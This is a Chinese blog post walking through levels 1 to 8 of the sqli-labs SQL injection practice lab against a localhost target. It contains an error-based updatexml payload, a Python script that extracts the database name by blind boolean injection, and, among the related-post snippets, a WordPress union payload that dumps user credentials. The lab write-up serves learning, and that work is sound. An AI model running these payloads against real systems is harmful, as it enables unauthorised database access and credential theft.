sqllabs注入复现

已于 2024-08-06 00:58:17 修改
阅读量140 收藏 1
点赞数 3
文章标签: sql 数据库
于 2024-08-06 00:22:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64238664/article/details/140937792
版权

Less1:

使用order by 查询出表有多少列

结果为3

之后用联合查询查出数据库名(id为-1不存在,则会输出我们的1,2,3)

查表名

查字段名

然后查询users表下的username和password的值

Less-2、3、4

没啥说的Less-2没有 ' ' 都不用闭合,Lees-3的闭合方式变成了 ') Less-4同Less-3

Less-5:

?id=1' and updatexml(1,concat(0x7e,user(),0x7e),1)--+

用到了updatexml函数来触发报错不能含有~(但是查了一下,~~ 字符本身不会导致特别的行为或安全问题,但错误的输入处理可能会使应用程序容易受到 SQL 注入攻击。反正使得XPATH错误输入即可)

而报错就会包含concat()的结果

使用SUBSTR进行字符串的截取(默认前32位)

 后换为32位至64位

64-96

 96-128

128-160 

160-192

到此结束

Less-6:

和5也一样就是闭合方式为双引号""

Less-8

靠猜security他的第一个ascii为115

 然后就是用循环不断重复出猜他的每一个字母
 

import time
import requests
 
url = 'http://127.0.0.1/sqllabs/Less-8/index.php'
 
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            r = requests.get(url, params=res)
            end_time = time.time()
            if “You are in..........” in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
 
inject_database(url)


 

jer‘jer’
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1280
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1223
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
SQL注入漏洞复现1
qq_68389880的博客
08-05 478
phpstudy下载地址:http://down.php.cn/PhpStudy20180211.zip。sqli-labs下载:https://github.com/Audi-1/sqli-labs。我是在本地安装小皮搭建环境,相比于在服务器上搭建环境,更加简单。
SQL注入
m0_75178803的博客
03-02 352
sql数据库注入的一些知识点
sql注入复现(1-14关)
weixin_65785894的博客
08-06 1117
判断注入是否存在判断sql语句是否拼接可以根据结果指定是字符型且存在。因为该页面存在回显,所以我们可以使用联合查询。联合注入爆列首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)爆显示位由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位由于只能查看一组数据,所以我们需要修改id值,让他要么远超这个数据表,要么小于0爆数据库名和版本号。
sql注入-常见注入方法复现
dragon的博客
08-06 860
报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查。
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5687
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
复现sql-labs
plutochen05的博客
08-05 882
复现sql注入漏洞
GaoXianGaoXian的博客
08-06 348
尝试通关Sqli-libs中Less-1
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
php168sql注入漏洞
08-15
- **原理**:SQL注入是一种常见的Web安全漏洞,通过向应用程序的输入字段插入恶意SQL代码,从而改变原有的查询逻辑,实现对数据库的非法操作。在本案例中,攻击者通过在`keyword`参数中插入特定的SQL语句,绕过了...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
Python程序设计:sql注入攻击.pptx
06-12
Python SQL注入代码复现;Python SQL注入代码复现;Python SQL注入代码复现;Python SQL注入代码复现;Python SQL注入代码复现;Python sql注入代码复现;Python sql注入代码复现;Python sql注入代码复现;Sql注入攻击;谢谢...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 435
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
SQL 时间盲注 (injection 第十六关)
最新发布
baishiqi12的博客
08-20 266
SQL 注入,仅供参考
mysql创建quartz定时任务相关表sql
xiexf20230814的博客
08-20 319
-存储Cron触发器的cron表达式和其他信息。--接下来,创建索引以提高性能;--存储简单触发器的额外属性。--存储复杂触发器的简单属性。--存储触发器的blob数据。--存储已触发的触发器信息。--存储调度器的状态信息。--存储暂停的触发器组。--存储触发器信息。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 481
【代码】数据库 - 基础。
wordpress sql注入复现
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的搜索框中输入以下内容: ``` ' UNION SELECT null, user_login, user_pass FROM wp_users-- ``` 2. 点击搜索按钮,可以看到网站返回的SQL语句中已经将当前WordPress网站的用户名和密码列举出来了。 3. 攻击者可以利用这个漏洞,将恶意代码插入到WordPress数据库中,从而获取网站的控制权。 需要注意的是,为了复现这个漏洞,需要对WordPress进行一定的设置和环境搭建。在实际攻击中,攻击者可能会通过其他途径进行攻击。建议管理员及时更新WordPress版本并采取安全措施来防范此类漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值